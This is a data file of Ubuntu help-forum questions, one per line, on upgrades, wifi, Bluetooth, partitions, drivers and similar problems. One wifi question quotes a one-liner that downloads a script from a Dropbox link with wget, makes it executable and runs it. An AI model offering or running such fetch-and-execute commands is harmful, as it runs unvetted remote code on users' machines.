506107	how does ubuntu process the press of the power button and other keys presented on the keyboard ?	how does ubuntu process the press of the power button and other keys presented on the keyboard ? there are many hot keys on my keyboard : power button , volumn up , volumn down , mute and so on . how does ubuntu process them ? and how deos ubuntu process functions keys like : fn+ ... ? are they related to acpid ?
506110	listing devices connected in hotspot through terminal	i connect my hotspot through ap-hotspot and i can see the notifications pop out displaying new device connected , device disconnected . ( because i want to learn about priveliges for access to use or not use the hotspot . ) first how can i list the device connected through terminal ?
506111	14.04.1 md5sums	the official checksum page only goes until 14.04 . where can i check my 14.04.01 download ( 119cb63b48c9a18f31f417f09655efbd ) ?
506114	set default browser when running as sudo	i am trying to run sudo and set the default browser . i want to set chromium as my default browser . i have tried sudo update-alternatives -- config x-www-browser this shows chrome as my default browser . however when i run in sudo mode and try to use grunt , it keeps using firefox as the default browser . without sudo it goes back to google chrome . what am i doing wrong ?
506115	automatic folder synchronization to a specific usb drive	i am using grsync for folder synchronisation with my usb drive . i usually synchronize folders manually . now i wish them to happen themselves . so , is it possible to synchronize folders automatically whenever my usb drive gets mounted ?
506116	bluez installation - configuration error for dbus 1.6	i am trying to install bluez 5.2 libraries on ubuntu 12.04. while running ./configure , i received error for glib2.0 , i was able to resolve by using sudo apt get-install for glib2 . now i am receiving the error `` configure : error : d-bus > = 1.6 is required '' . i have downloaded dbus 1.8.6 and installed . but still i am receiving the same error . when checked in /etc folder i still find dbus-1 . is there any installation error ? regards , padma
506117	how do i get ubuntu for my android phone ?	can someone please suggest me on how can i replace my android phone os with ubuntu ?
506121	easy way to create an installation usb	unetbootin and other scripts are too much of a hassle , and dd is just plain scary . how can an unenlightened user like me create an ubuntu installation usb using intuitive , colorful graphical tools ?
506125	aspire xc-603 . help to boot from disc	can any one show or tell me how to change my boot options . l have a new aspire xc-603 came with windows 8 installed , how can i disable the uefi to boot from a disc
506128	12.04 lts to 14.01.1 lts	i hate asking questions on these forums simply because i know it has been asked and answered somewhere else , but after hours of looking i can not find an acceptable solution to my question . i am trying to upgrade from 12.04 lts to 14.04.1 lts using the command : sudo do-release-upgrade since it is now august 2nd and the 14.04.1 release came out on july 25th , the above command should do what is expected ( upgrade the system to 14.04 lts ) , but it does not . instead i get the dreaded : checking for a new ubuntu release no new release found i do not want to use : do-release-upgrade -d simply because i should n't have to and i do n't want to deal with the 1 in 1,000,000 chance that i will get the non-lts update that breaks my system ( my luck says it will happen ) . so , what is going on , and how do i fix it ? again , please do n't suggest that i use : sudo do-release-upgrade -d because i should n't have to and i do n't want to . thank you for your time and help .
506129	problems with ubuntu 14.04 64 bit	i updated to ubuntu 14.04 64 bit yesterday and there are problems everywhere . firefox almost never works . it crashes all the time . i also get some system errors . i ca n't find anyone else having the same problems . i wonder if it 's a hardware thing . i even reinstalled ubuntu to see if it was an installation issue but the problems remain the same . below is some crash data i collected from firefox : bp-adfc4917-0417-44c9-b333-1480b2140802 bp-a011a839-742d-4656-b476-cd0a42140802 bp-592009e9-8124-42a7-95fe-355202140802
506130	xubuntu 14.04.1 lts - thumb drive not auto-mounting	xubuntu 14.04.1 will not auto-mount my usb thumbdrive automatically when it is already connected to the computer . this happens every time during the initial bootup/startup and/or after a restart of the computer . xubuntu will detect the presence of the thumbdrive but will not `` auto-mount '' . i have to manually mount the drive . on the other hand , with no thumbdrive connected ( inserted ) to the computer and then , perform a startup or restart and then , connect the thumbdrive manually to the computer , xubuntu 14.04.1 will detect and automatically mount the drive . is this an `` unresolved '' issue with xubuntu ? is there any fix for this ?
506132	how to change cursor position in gnome shell , at login ?	i believe gnome shell sets the cursor position in the `` hot corner '' of the screen , -at login- , to open the activities gui , after login . i do not want this . i 'd like to have my cursor positioned `` center screen '' at login . i 'm thinking i 'd need to modify a file ... ? it 's cursor position ... not theme . thanks in advance . stanz
506135	having /boot partition trouble	i 'm trying to switch from ubuntu to windows 7 , mainly due to compatibility issues . i 'm having trouble doing so however . whenever i start up my computer it says , i have `` 0 bytes '' left in my /boot partition . this is hindering me from either going to ubuntu 14.04 lts or installing windows .
506136	how to use bluetooth speaker	i 'm using ubuntu gnome ( with kde ) 14.04 i 've read through connect to jbl bluetooth speaker and i saw exact same behaviour when i 'm logged in gnome . however in kde : my bluetooth speaker is detected and connected : master channel is set to bluetooth speaker ( sb102n ) in sound setup bluetooth speaker has highest priority when i click on `` test '' sound is played through bluetooth speaker but normal operation ( browser , movie player , music player ) use laptop speaker only . is it still a kernel issue as discussed in linked question ( should i try installing latest kernel ) ? or am i missing some settings ? [ update ] : ok so apparently vlc can route sound to bluetooth speaker . if i open vlc - > audio device - > [ select my bluetooth speaker ] why is it that even after setting priorities and default playback device , i ca n't use the speaker ?
506139	14.04 server on intel nuc . monitor looses signal during boot	i have freshly installed 14.04 server on a intel nuc ( newest generation ) . monitor connected on displayport using a dp to vga adapter it boots , shows scrolling boot messages , then blank screen ( monitor says no signal ) i can ssh into server , works perfectly beside blank console screen . i believe the moment when this happens is when ubuntu tries to adjust the resolution of graphics adapter and monitor as it does since a few versions also for ubuntu server . in recovery mode where the resolution is not adjusted i can get to root prompt without problem . any ideas how to fix this ?
506142	ubuntu deleted windows 7	i have downloaded ubuntu 14.04 and trying to install it on my laptop , but after installation completed , i seen that ubuntu deleted my windows 7. i never permitted to do so . then why it happens . i want my windows 7 as its back . reply with any possible options . asap .
506149	14.04 wifi unstable	wifi will repeatedly cut out after an undetermined amount of time . i 've read the unstable wireless connection in ubuntu 14.04 but i do n't want to disable n mode b/c i want the faster speed . i have this card : http : //www.intel.com/p/en_us/support/highlights/wireless/cwn-1030 i also tried turning off power management but that does n't work either sudo iwconfig wlan0 power off i ran the wifi script wget -n -t 5 -t 10 http : //dl.dropbox.com/u/57264241/wireless_script & & chmod +x wireless_script & & ./wireless_script here are the results : http : //pastebin.com/1adpqy7d
506152	ubuntu 14 deleted all my files from all my partition	i decided that i do n't want to use w7 and i want ubuntu instead . i installed ubuntu , but it deleted all my files from all my partitions : ( i really do n't understand why ubuntu intallation did not tell me that it will destroy all my partition : ( it 's somekind of trap for windows users ? i was thinking that it would be similar with windows and ubuntu will ask me what i want to do with my partitions . that is the reason why i made more partitions , only not to affect my good partition : ( can i recover my data ? or did i loose all my personal photos ? please help . i did not used the desktop after the installation and i have access to a extra pc and external hard .
506154	ca n't upgrade from 13.10 to 14.xx	when attemptng to upgrade i get the following : user @ home : ~ $ sudo apt-get dist-upgrade reading package lists ... error ! unable to parse package file /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_sucy-updates_main_i18n_translation-en ( 1 ) e : the package lists or status file could not be parsed or opened . user @ home : ~ $ so that is the error message i get also when i try to open the software center or aptitude i also get similar messages . i have tried the following : sudo apt-get update & & dist-upgrade someone please help me i have no patience for this
506155	alternative to macromedia flash [ not flash player ]	what is the best flash building alternative for adobe flash or macromedia flash ?
506156	formatting for windows 8 dual boot - drive not found	i have a ubuntu pc that i 'm trying to install windows 8 on as a dual boot . i used gparted to shrink the existing partition and create a new one formatted as ntfs , but when i tried to install windows from a usb drive , it told me that it could not find a drive to install to . i saw somewhere someone reporting a similar problem which they solved by tagging the partition using fdisk , but when i use fdisk it only shows one partition and outputs : `` warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . '' so i have no idea how to tag the hard drive if fdisk ca n't find it . i 've also tried leaving a large segment of unallocated space , but that has n't helped either . please help !
506158	unable to initialize frontend : dialog when using ssh	i am executing the following command over ssh in a testing environment , as root : ssh < remote_srv > `` apt-get autoremove '' in my sshd_config i have `` permitrootlogin without-password '' and i have added the id_rsa.pub of root to the authorized_keys file on the remote server . nevertheless i get following errors : debconf : unable to initialize frontend : dialog debconf : ( term is not set , so the dialog frontend is not usable . ) debconf : falling back to frontend : readline debconf : unable to initialize frontend : readline debconf : ( this frontend requires a controlling tty . ) debconf : falling back to frontend : teletype i have looked this up in de man pages of ssh , but could n't wrap my mind around the explanation on pseudo-terms and ttys . is there anybody who can explain above errors ? i guess it 's a missing option , but which ? both platforms are ubuntu 14.04 lts .
506160	no wired connection and wirewireless disabled	i am new to linux kubuntu 14 , i tried installing kubuntu 14.04 without internet connection which went smoothly , when i finish installing i was surprise to get a network or connection icon with a red sign showing wireless disable . since i have been battling with all kind of solution to fix this problem i ca n't just find any , i went to internet point and also try to connect ethernet wire it did n't work also can someone help me . when i run lspci -nn i get 02.06.1 firewire ( ieee 1394 ) [ 0c00 ] : texas instruments pcixx12 ohci compliant ieee 1394 host controller [ 104c:803a ] 02.0e.0 ethernet controller [ 0200 ] : broadcom corporation bcm4401-b0 100base-tx [ 14e4:170c ] ( rev 02 ) 10.00.0 network controller [ 0280 ] : broadcom corporation bcm4311 802.11b/g wlan [ 14e4:4311 ] ( rev 01 )
506163	synergy refuses to cooperate on ubuntu server	i have synergy installed on both ubuntu server ( davecorp ) and my windows 8 machine . ( davidspc ) my etc/synergy.conf file looks like this . section : screens davecorp : davidspc : end section : links davecorp : right = davidspc davidspc : left = davecorp end i have enabled the corresponding port in both my windows machine and the server . whenever i try to initialize the connection as a client from my windows machine in the synergy interface log it states failed to connect to server : connection was refused . synergy seems to start fine in ubuntu what is happening ? does this application even work in ubuntu server ? i couldnt use startx to run the interface so i had to edit the config file manually .
506167	how do you save the routing table on the beaglebone black ( angstrom )	i flashed my beagle bone with the angstrom image and i set it up so that it can get internet over the usb connection and one of the steps for that is this command : route add default gw 192.168.7.1 how do i make that permanent ? that setting is lost after i reboot . i tried using systemd with this service route.service : [ unit ] description=set gateway to allow network re-routing to laptop after=network.target [ service ] type=simple execstart=/home/root/route # this is a script that just runs the command [ install ] wantedby=multi-user.target network.target i can run it manually and it works , but when it is loaded at startup it exits with an error i solved it by adding this : restart=on-failure restartsec=5 to the [ service ] section
506170	how to add linux mint desktop to ubuntu 14.04 ?	hi i just want to ask what are the commands to be typed in the terminal to add cinnamon ( linux mint desktop ) to the list of ui in the ubuntu 14.04 login ? i just recently upgraded my ubuntu from 12.10 to 14.04 and after doing so gnome , cinnamon was removed in the list but fluxbox stayed so i want have it back again ( i mean the lastest vesion ) . i tried following the steps in option 1 and option 2 of the link how do i install the cinnamon desktop ? but i received the following errors : ralf @ ralf-lenovo-g470 : ~ $ sudo apt-get install cinnamon reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : cinnamon : depends : gnome-panel but it is not installable or tint2 but it is not installable recommends : gnome-themes-standard but it is not installable e : unable to correct problems , you have held broken packages . below is the content of my /etc/apt/sources.list # required # deb http : //ph.archive.ubuntu.com/ubuntu karmic main restricted universe multiverse # deb http : //ph.archive.ubuntu.com/ubuntu karmic-updates main restricted universe multiverse # deb http : //ph.archive.ubuntu.com/ubuntu karmic-security main restricted universe multiverse # optional # deb http : //old-releases.ubuntu.com/ubuntu/ karmic-backports main restricted universe multiverse deb http : //archive.ubuntu.com/ubuntu trusty main universe restricted multiverse deb http : //packages.linuxmint.com/ qiana main upstream import i think there should be more trusty than karmic repositories to be found in here .
506171	ubuntu do-release-upgrade	i have a question about do-release-upgrade . i have a system with the following component installed ( and some more , but these are not relevant to the question , the server 's purpose is to be a mysql server for my bacula backup system ) : bacula client since it is a server , i specifically did not install bacula-traymonitor , which would have result of a cascade of packages being installed that are related to x11 . x11 is not useful for server environments imho , although i do understand some of the x11 libraries being necessary for some daemons like opensshd , which depend on the x11 libraries and which is why some of those x11 libraries have probably ended up on my installation anyway . i just issued do-release-upgrade -d ( for some reason without the -d option , it still does not show any release upgrades , even though it 's after the 24th of july ) , and i noticed the following : bacula-traymonitor is going to be installed , along with the whole cascade of x11 stuff that i specifically do not want on my server . the package is not required for the proper operation of bacula client , so it should not show up on the upgrade radar as a package to be installed . i would classify this as a bug . aside from the obvious method , is there any way for me to instruct do-release-upgrade not to install all the superfluous stuff like bacula-traymonitor ? the obvious method being `` let do-release-upgrade do its thing and then remove the packages afterward '' , which indubitably leaves remnants on my system , like unused x11 libraries that are not autoremoved after i removed bacula-traymonitor . i have several other systems i wish to upgrade to 14.04.1 lts , and nearly all of them have bacula-client installed , so this would mean a lot of unnecessary work . details below : remove ( was auto installed ) libperl5.14 libsnmp15 xz-lzma install : aptitude-common bacula-traymonitor cpp-4.8 crda dh-python fontconfig fontconfig-config fonts-dejavu-core g++-4.8 gawk gcc-4.8 gcc-4.8-base gcc-4.9-base hicolor-icon-theme init-system-helpers iproute2 iw kmod libaio1 libapparmor1 libapt-inst1.5 libarchive-extract-perl libasan0 libasprintf0c2 libatk1.0-0 libatk1.0-data libatm1 libatomic1 libaudit-common libaudit1 libavahi-client3 libavahi-common-data libavahi-common3 libbind9-90 libboost-iostreams1.54.0 libcairo2 libcap2-bin libcgmanager0 libck-connector0 libcloog-isl4 libcups2 libdatrie1 libdb5.3 libdbi1 libdebconfclient0 libdns100 libestr0 libfakeroot libfile-fcntllock-perl libfontconfig1 libgcc-4.8-dev libgck-1-0 libgcr-3-common libgcr-base-3-1 libgdk-pixbuf2.0-0 libgdk-pixbuf2.0-common libgnutls-openssl27 libgraphite2-3 libgssglue1 libgtk2.0-0 libgtk2.0-bin libgtk2.0-common libharfbuzz0b libisc95 libisccc90 libisccfg90 libisl10 libitm1 libjasper1 libjbig0 libjpeg-turbo8 libjpeg8 libjson-c2 libjson0 libkmod2 libldb1 liblog-message-simple-perl liblwres90 libmodule-pluggable-perl libmpc3 libmpdec2 libntdb1 libnuma1 libpam-cap libpam-systemd libpango-1.0-0 libpangocairo-1.0-0 libpangoft2-1.0-0 libperl5.18 libpixman-1-0 libpod-latex-perl libpolkit-agent-1-0 libpolkit-backend-1-0 libprocps3 libpython-stdlib libpython2.7-minimal libpython2.7-stdlib libpython3-stdlib libpython3.4-minimal libpython3.4-stdlib libsasl2-modules-db libsemanage-common libsemanage1 libsepol1 libsigsegv2 libsmbclient libsnmp30 libssh2-1 libstdc++-4.8-dev libsystemd-daemon0 libsystemd-login0 libtasn1-6 libterm-ui-perl libtevent0 libtext-soundex-perl libthai-data libthai0 libtiff5 libtirpc1 libtsan0 libudev1 libustr-1.0-1 libxcb-render0 libxcb-shm0 libxcomposite1 libxcursor1 libxdamage1 libxfixes3 libxi6 libxinerama1 libxrandr2 libxrender1 libxtables10 linux-generic linux-headers-generic linux-image-extra-3.13.0-32-generic linux-image-generic nagios-plugins-common ncurses-term openssh-sftp-server policykit-1 python-configobj python-ldb python-ntdb python-requests python-samba python-secretstorage python-six python-talloc python-tdb python-urllib3 python3 python3-apport python3-apt python3-commandnotfound python3-dbus python3-distupgrade python3-gdbm python3-gi python3-minimal python3-problem-report python3-update-manager python3.4 python3.4-minimal rpcbind run-one samba-libs shared-mime-info systemd-services systemd-shim ubuntu-release-upgrader-core wireless-regdb upgrade : accountsservice acpid adduser apport apport-symptoms apt apt-transport-https apt-utils apt-xapian-index aptitude arj at bacula-client bacula-common bacula-console bacula-doc bacula-fd base-files base-passwd bash bash-completion bc bind9-host binutils bsdmainutils bsdutils build-essential busybox-initramfs busybox-static byobu bzip2 ca-certificates command-not-found command-not-found-data console-setup coreutils cpio cpp cpp-4.6 cron curl dash dbus debconf debconf-i18n debianutils diffutils dkms dmidecode dmsetup dnsutils dosfstools dpkg dpkg-dev dstat e2fslibs e2fsprogs ed eject fakeroot file findutils fonts-ubuntu-font-family-console ftp fuse g++ g++-4.6 gcc gcc-4.6 gcc-4.6-base geoip-database gettext-base gir1.2-glib-2.0 gnupg gpgv grep groff-base grub-common grub-pc grub-pc-bin grub2-common gzip hdparm hostname htop ifupdown info initramfs-tools initramfs-tools-bin initscripts insserv install-info installation-report iotop iproute iptables iputils-ping iputils-tracepath irqbalance isc-dhcp-client isc-dhcp-common iso-codes joe kbd keyboard-configuration klibc-utils krb5-locales ksh landscape-common language-pack-en language-pack-en-base language-selector-common less libaccountsservice0 libacl1 libalgorithm-diff-perl libalgorithm-diff-xs-perl libapt-pkg4.12 libasn1-8-heimdal libattr1 libblkid1 libbsd0 libbz2-1.0 libc-bin libc-dev-bin libc6 libc6-dev libcap-ng0 libcap2 libclass-isa-perl libcomerr2 libcurl3 libcurl3-gnutls libcwidget3 libdb5.1 libdbd-mysql-perl libdbi-perl libdbus-1-3 libdbus-glib-1-2 libdevmapper-event1.02.1 libdevmapper1.02.1 libdpkg-perl libdrm-intel1 libdrm-radeon1 libdrm2 libedit2 libelf1 libept1.4.12 libevent-2.0-5 libexpat1 libffi6 libfreetype6 libfribidi0 libfuse2 libgc1c2 libgcc1 libgcrypt11 libgdbm3 libgeoip1 libgirepository-1.0-1 libglib2.0-0 libgmp10 libgnutls26 libgomp1 libgpg-error0 libgpm2 libgssapi-krb5-2 libgssapi3-heimdal libhcrypto4-heimdal libheimbase1-heimdal libheimntlm0-heimdal libhtml-template-perl libhx509-5-heimdal libidn11 libio-string-perl libiw30 libjs-jquery libk5crypto3 libkeyutils1 libklibc libkrb5-26-heimdal libkrb5-3 libkrb5support0 libldap-2.4-2 liblocale-gettext-perl liblockfile-bin liblockfile1 liblzma5 liblzo2-2 libmagic1 libmount1 libmpfr4 libmysqlclient18 libncurses5 libncurses5-dev libncursesw5 libnewt0.52 libnfnetlink0 libnih-dbus1 libnih1 libnl-3-200 libnl-genl-3-200 libopts25 libp11-kit0 libpam-modules libpam-modules-bin libpam-runtime libpam0g libparted0debian1 libpcap0.8 libpci3 libpciaccess0 libpcre3 libpcsclite1 libpipeline1 libplymouth2 libpng12-0 libpolkit-gobject-1-0 libpopt0 libpq5 libpython2.7 libquadmath0 libradius1 libreadline5 libreadline6 libroken18-heimdal librtmp0 libsasl2-2 libsasl2-modules libselinux1 libsensors4 libsigc++-2.0-0c2a libslang2 libsnmp-base libsqlite3-0 libss2 libssl1.0.0 libstdc++6 libstdc++6-4.6-dev libsub-name-perl libtalloc2 libtdb1 libterm-readkey-perl libtext-charwidth-perl libtext-iconv-perl libtimedate-perl libtinfo-dev libtinfo5 libusb-0.1-4 libusb-1.0-0 libuuid1 libwbclient0 libwind0-heimdal libwrap0 libx11-6 libx11-data libxapian22 libxau6 libxcb1 libxdmcp6 libxext6 libxml2 libxmuu1 linux-firmware linux-generic-lts-raring linux-generic-lts-trusty linux-headers-3.13.0-32 linux-headers-3.13.0-32-generic linux-headers-generic-lts-raring linux-headers-generic-lts-trusty linux-image-3.13.0-32-generic linux-image-generic-lts-raring linux-image-generic-lts-trusty linux-libc-dev locales lockfile-progs login logrotate lsb-base lsb-release lshw lsof ltrace lvm2 m4 make makedev man-db manpages manpages-dev mawk mc mc-data mdadm memtest86+ mime-support mlocate module-init-tools mount mountall mtr-tiny multiarch-support mysql-client-5.5 mysql-client-core-5.5 mysql-common mysql-server mysql-server-5.5 mysql-server-core-5.5 mysqltuner nagios-nrpe-server nagios-plugins nagios-plugins-basic nagios-plugins-standard nano ncurses-base ncurses-bin ncurses-doc net-tools netbase netcat-openbsd ntp ntp-doc ntpdate openssh-client openssh-server openssl os-prober parted passwd patch pciutils perl perl-base perl-modules plymouth plymouth-theme-ubuntu-text popularity-contest powermgmt-base ppp pppconfig procmail procps psmisc python python-apport python-apt python-apt-common python-chardet python-crypto python-dbus python-dbus-dev python-debian python-gdbm python-gi python-httplib2 python-keyring python-launchpadlib python-lazr.restfulclient python-lazr.uri python-minimal python-newt python-oauth python-openssl python-pam python-pkg-resources python-problem-report python-serial python-simplejson python-twisted-bin python-twisted-core python-wadllib python-xapian python-zope.interface python2.7 python2.7-minimal readline-common resolvconf rsync rsyslog samba-common samba-common-bin screen sed sendmail sendmail-base sendmail-bin sendmail-cf sendmail-doc sensible-mda sensible-utils sgml-base smbclient snmp ssh-import-id strace sudo sysstat sysv-rc sysvinit-utils tar tasksel tasksel-data tcpd tcpdump telnet time tmux tzdata ubuntu-keyring ubuntu-minimal ubuntu-standard ucf udev ufw unzip update-manager-core update-notifier-common upstart ureadahead usbutils util-linux uuid-runtime vim vim-common vim-runtime vim-tiny w3m watershed wget whiptail whois wireless-tools wpasupplicant xauth xfsprogs xkb-data xml-core xz-utils zlib1g
506172	cant boot up from an external source anymore , please help ... .. ( totally a different sceenario from the usual cases )	am a ubuntu user and quiet good with it , have been using it for like a year . i bought a packard bell easynote te laptop , which had windows 8.1 , i then installed ubuntu 14.04 using the whole hdd , totally removing windows 8 , . everything was fine until recently , am an engineering student and i needed to install some few programs that are only run on windows . so i downloaded windows 7 iso file made a bootable sb , but , when i tried booting from it , my laptop would n't realize that there is a usbs . but when i put a bootable usb with ubuntu everything was fine , so i thought maybe i have to delete everything in my hdd , so i used my live bootable usb with ubuntu ( under the try ubuntu ) . in there i then opened gparted and deleted all partitions in my hdd and i did n't format it to ntfs or fat , i just left it unformatted . after that , when i restart my laptop i cant boot from a usb at all , its like my laptop [ does n't recognize there is a usb inserted , either it has ubuntu or windows now all do n't work , it shows a black screen saying checking media , then go to another message which says `` default boot missing or boot failed : inserts recovery media and hit key `` please help guys i need this laptop since i am an engineering student , and my laptop has no cd drive ... ..
506175	ca n't exit the `` workspace switcher '' when a window is dragged	i am running ubuntu 14.04.1 lts with the recent `` unity '' design on gnome . i used to make heavy use of the `` workspace switcher '' but recently often times when i try to drag a window from one workspace to another , the workspace switcher just wo n't go back to displaying a single workspace : at this point i am unable to exit the workspace switcher . with a little luck , i can at least save my data using keyboard shortcuts . then i have to press the power button to shutdown the system . any ideas on how to debug this ?
506177	apple magic mouse bluetooth in dell xps 13 ubuntu 14.04 randomly freeze and reconnect automatically	environment : - dell xps 13-9333 - apple magic mouse - ubuntu 14.04.1 lts 64bit - kernel 3.16.0-031600rc7-generic , and latest update 14.04 , kernel 3.13.0-30.55 - linux-firmware 1.127.5 , # dmesg |grep iwlwifi , show : [ 7.547624 ] iwlwifi 0000:02:00.0 : loaded firmware version 23.214.9.0 op_mode iwlmvm [ 7.582002 ] iwlwifi 0000:02:00.0 : detected intel ( r ) dual band wireless ac 7260 , rev=0x144k - lsusb show : bus 001 device 002 : id 8087:8000 intel corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 002 device 004 : id 8087:07dc intel corp . bus 002 device 003 : id 1bcf:28ac sunplus innovation technology inc . bus 002 device 002 : id 06cb:0af8 synaptics , inc . bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub tried so far : 1 . update upstream kernel ( http : //kernel.ubuntu.com/~kernel-ppa/mainline/ ) 2 . install blueman to connect bluetooth input service 3 . install laptop-mode-tools modules - wireless-iwlpower.conf iwl_ac_power=0 iwl_batt_power=1 - wireless-power.conf wireless_ac_power_saving=0 wireless_batt_power_saving=1 - usb-autosuspend.conf autosuspend_use_whitelist=1 autosuspend_usbid_blacklist= '' 8087:07dc 8087:8000 '' 4 . disable iwlwifi 11n_disable from what is causing my intel 7260 bluetooth device to disconnect when i unblock it with rfkill ? sudo vi /etc/modprobe.d/wifi-disable11n.conf options iwlwifi 11n_disable=1 5 . echo -1 autosuspend_delay_ms from http : //ubuntuforums.org/showthread.php ? t=2159645 & page=6 add rc.local for : # ! /bin/sh # disable autosuspend bluetooth btusb_dev= '' 8087:07dc '' btusb_binding= '' $ ( lsusb -d `` $ btusb_dev '' | cut -f 1 -d : | sed -e 's , bus , , ' -e 's , device , / , ' | xargs -i { } udevadm info -q path -n /dev/bus/usb/ { } | xargs basename ) '' echo `` disabling autosuspend for bluetooth usb : $ btusb_binding ... '' echo -1 > `` /sys/bus/usb/devices/ $ btusb_binding/power/autosuspend_delay_ms '' step to create : 1 . connect magic mouse with bluetooth with blueman-assistant , try also with bluez command : sudo bluez-simple-agent hci0 1c:1a : c0 : dd:56:69 & & sudo bluez-test-device trusted 1c:1a : c0 : dd:56:69 yes & & sudo bluez-test-input connect 1c:1a : c0 : dd:56:69 2. mouse randomly disconnect / freeze , after few clicks it happen reconnect automatically but checked with output from dmesg , syslog , but no information changes it 's been 1 month with no solution , except change mouse ? thanks just buy new usb bluetooth , will update later update if any changes better aug-10-2014 - went for soundbot bluetooth adaptor 4.0 . now apple magic mouse play nice with ubuntu thanks
506180	menu messaging with libindicate-qt	i would like to make my application appeared in the messaging menu . for this purpose i use libindicate-qt . on ubuntu 12.04 everything works , but 14.04 is not . please help me .
506182	12.04 lts will no longer download updates	the machine is a newish one using the 64 version . it has always updated ok but now i get the message : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/pool/main/u/update-manager/update-manager-core_0.156.14.16_amd64.deb 404 not found failed to fetch http : //gb.archive.ubuntu.com/ubuntu/pool/main/u/update-manager/update-manager_0.156.14.16_all.deb 404 not found as it is the lts version of 12.04 is n't it supposed to work for 5 years ? what can i do ? ok , did sudo apt-get update , there were no error messages , closed terminal and ran update manager again , this time it worked ok . many thanks .
506187	just setup ubuntu as webserver , what about my amp setup on my other computer do i remove it ?	my question is now that i have setup the ubuntu web server do i have to remove the apache mysql and php from the laptop so it doesnt conflict with the server and/or can i migrate the working settings off my lappy to the ubuntu web server . p.s i have just setup up ubuntu 14.4.1 server with lamp for the purpose of web development server on a separate box on my network , before this i was working on my laptop ( mac powerbook ) i have apache2 , mysql and php installed and running on the localhost from the laptop ( everything from the lappy ) . thanks in advance .
506188	burning installation cd/dvd	i have upgraded from ubuntu 12.04lts to ubuntu14.04lts . is it possible to burn installation on cd/dvd of this version 14.04lts ? how to go about it ?
506192	help with xdotool	i 'm trying to make conky work with lubuntu using xdotool . xdotool search -- class `` pcmanfm '' behave % 2 focus windowraise $ ( xdotool search -- class `` conky '' ) i get an error : xdotool : unknown command : 44040194
506198	how do i install venom tox on ubuntu 12.04	attempting to install venom using apt makes it possible for me to only start it if i am root . building from source gives the errors : -- checking for module 'json-glib-1.0 > =0.14' -- package 'json-glib-1.0 > =0.14 ' not found cmake error at /usr/share/cmake-2.8/modules/findpkgconfig.cmake:266 ( message ) : a required package was not found call stack ( most recent call first ) : /usr/share/cmake-2.8/modules/findpkgconfig.cmake:320 ( _pkg_check_modules_internal ) cmake/pkgcheckmodulesfullpath.cmake:21 ( pkg_check_modules ) src/cmakelists.txt:35 ( pkg_check_modules_fullpath ) -- checking for module 'libtoxcore > =0.0' -- package 'libtoxcore > =0.0 ' not found cmake error at /usr/share/cmake-2.8/modules/findpkgconfig.cmake:266 ( message ) : a required package was not found how do i install and use venom as a normal user ? thank you
506200	ububntu 14.04 . unable to mount 63 gb volume	trying to use 64gb microsd cards with usb adapter , but always get this error . error mounting /dev/sdb1 at /media/andrew/0123-4567 : command-line `mount -t `` exfat '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , iocharset=utf8 , namecase=0 , errors=remount-ro , umask=0077 '' `` /dev/sdb1 '' `` /media/andrew/0123-4567 '' ' exited with non-zero exit status 32 : mount : unknown filesystem type 'exfat' is it possible to fix it somehow ? thanks .
506201	switching between graphic cards in radeon open source driver	i am running ubuntu 14.04 with unity in my laptop with ( amd hd8760/intel ) dual graphics . fglrx is not working so i am using open source radeon driver . i know how to switch between cards when using fglrx . aticonfig -- pxl # list current activated gpu sudo aticonfig -- px-dgpu # activate discrete gpu ( high-performance ) , re-start x to effect . sudo aticonfig -- px-igpu # activate integrated gpu ( power-saving ) , re-start x to effect . 1.when does the driver ( opensource one ) use radeon graphic card ? 2.how do i do the switching now ( opensource driver ) ? 3.do i have any application to do this ( like catalyst in case of fglrx ) . 4.how do i check whether dpm is enabled in radeon ?
506207	how do i sync metadata ?	pryor to an update , i spent months editing and recovering album meta-data manually from the internet , making sure everything is the way it should be , sad to say after a kernel update i could not log in and decided to reinstall my operating system , lucky for me i had a backup , all i want to know is how can i recover music id3 tags from `` metadata.db '' for banshee ?
506209	what 's the right way to run a program as a service ?	i would like to run a grails server in the background , so that stating and stopping it would be done using : sudo service my-server start sudo service my-server stop the grails server is currently executed using a shell script , which sets a few environment variables and runs grails . what 's the standard way to run this script as a service ?
506210	how do i get rid of fctix popup panel completely ?	i upgraded my desktop from ubuntu 12.04 lts to 14.04 lts last night . i installed , tried and then removed fcitx but found the fcitx popup pandel became phantom in the system . it always appears after chinese input mode is enabled . how can i uninstall the fcitx package completely ?
506213	how to install zte ac8700 in ubuntu 14.04	i 'm new to ubuntu world . i installed ubuntu 14.04 one week ago , but i 'm unable to install my modem . without modem there is no use of ubuntu . below is my modem installing history . raj @ raj-system-product-name : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 005 device 002 : id 05c6:3197 qualcomm , inc. cdma wireless modem/phone bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 002 : id 0458:003a kye systems corp. ( mouse systems ) netscroll+ mini traveler / genius netscroll 120 bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub raj @ raj-system-product-name : ~ $ ls /dev/tty* /dev/tty /dev/tty23 /dev/tty39 /dev/tty54 /dev/ttys10 /dev/ttys26 /dev/tty0 /dev/tty24 /dev/tty4 /dev/tty55 /dev/ttys11 /dev/ttys27 /dev/tty1 /dev/tty25 /dev/tty40 /dev/tty56 /dev/ttys12 /dev/ttys28 /dev/tty10 /dev/tty26 /dev/tty41 /dev/tty57 /dev/ttys13 /dev/ttys29 /dev/tty11 /dev/tty27 /dev/tty42 /dev/tty58 /dev/ttys14 /dev/ttys3 /dev/tty12 /dev/tty28 /dev/tty43 /dev/tty59 /dev/ttys15 /dev/ttys30 /dev/tty13 /dev/tty29 /dev/tty44 /dev/tty6 /dev/ttys16 /dev/ttys31 /dev/tty14 /dev/tty3 /dev/tty45 /dev/tty60 /dev/ttys17 /dev/ttys4 